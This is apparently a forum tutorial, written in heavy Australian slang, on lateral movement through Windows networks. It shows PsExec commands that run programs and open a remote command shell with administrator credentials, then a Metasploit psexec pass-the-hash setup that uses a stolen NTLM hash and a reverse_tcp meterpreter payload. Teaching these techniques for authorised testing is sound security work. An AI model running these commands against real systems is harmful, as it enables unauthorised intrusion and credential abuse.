Lateral Movement, is all about how the attackers sneak around your network. They're tryin' to get into those remote systems and take control. To reach their big goal, they gotta poke around and find their target, then get access to it. Might be they'll install their own dodgy remote tools, or they could use legit login details and the network's own tools, which can be a bit harder to spot.
Reaching their objective often means these ratbags have to hop through a few different systems and accounts to get where they wanna go. Gotta keep movin' around, like a bloody kangaroo, to get to the prize.
Lateral Movement with the Ol' PsExec Trick
PsExec is a bit of a ripper - it's like a lightweight version of telnet that lets you run stuff on other systems, no need to install any extra software. You can even get full control of console apps on the remote end, without all the fuss.
One of the best things about PsExec is that you can use it to launch a remote command prompt, or run tools like IpConfig that normally can't show you info about other systems.
We can use PsExec to authenticate with the target system fair and square, then run whatever commands we want or even start up a remote command prompt. Bit of a sneaky tactic, but it gets the job done.
I'll be running PsExec from my Windows VM as you may encounter a few issues when running PsExec on Linux with Wine.
You can nab yourself a copy of PsExec from this ripper of a link: https://docs.microsoft.com/en-us/sysint ... ads/psexec
Once you've downloaded the PsTools archive, just give it a good ol' extract and open up a Windows command prompt in the folder where you put it.
To use PsExec to run a command on the target system, you'll need to know the computer name or IP address, the username, and the password. Then you can just punch in a command like this:
Code: Select all
./PsExec64.exe \\<TARGET-IP> -u Administrator -p <PASSWORD> ipconfigIn this little exercise, we're gonna use the ol' PsExec to run the ipconfig command on the target system. That way, we can make sure we can authenticate properly with PsExec
PsExec will authenticate with the target system, run the ipconfig command, and then give us the output. Easy as!
We can also use PsExec to start up a remote command prompt session on the target system. Just run this beaut of a command:
Code: Select all
./PsExec64.exe \\<TARGET-IP> -u Administrator -p <PASSWORD> cmd.exeIf we nail the authentication, we'll get ourselves a remote command shell on the target.
With that remote session up and running, we can start poking around the network, scanning and pinging other hosts we might be able to jump to. Gotta keep that lateral movement going!
Passin' the Hash with PsExec
If you couldn't snag any plain-text passwords from the target system, no worries - you can use the pass-the-hash trick with the Metasploit PsExec module. This lets you authenticate to SMB (that's Server Message Block, for the uninitiated) using the NTLM hash of a user's password, instead of the actual password.
What's Pass-the-Hash?
Pass-the-hash is a technique that lets the attackers authenticate to a remote system by using the NTLM or LanMan hash of a user's password, without needing the actual plaintext password.
Now, we're gonna be targeting a Windows 10 system. First, make sure you've already got your initial foothold on the system and a nice meterpreter session going.
On your Kali terminal, fire up the SMB PsExec Metasploit module by running this beaut:
Code: Select all
msf> use exploit/windows/smb/psexecNext, you'll need to set the payload:
Code: Select all
msf> set payload windows/x64/meterpreter/reverse_tcpNow, set the SMBUser and SMBPass options with the username and NTLM hash of the account you want to use. In this case, we'll use the Administrator account:
Code: Select all
msf> set SMBUser <USERNAME>Code: Select all
msf> set SMBPass <NTLM Hash>Finally, set the RHOSTS option to the IP address of your target system:
Code: Select all
msf> set RHOSTS <TARGET-IP>All right, time to give it a crack! Run the module and see if you can get that meterpreter session goin':
Code: Select all
msf> runIf the authentication works, you should get a shiny new meterpreter session with the privileges of the user you authenticated as!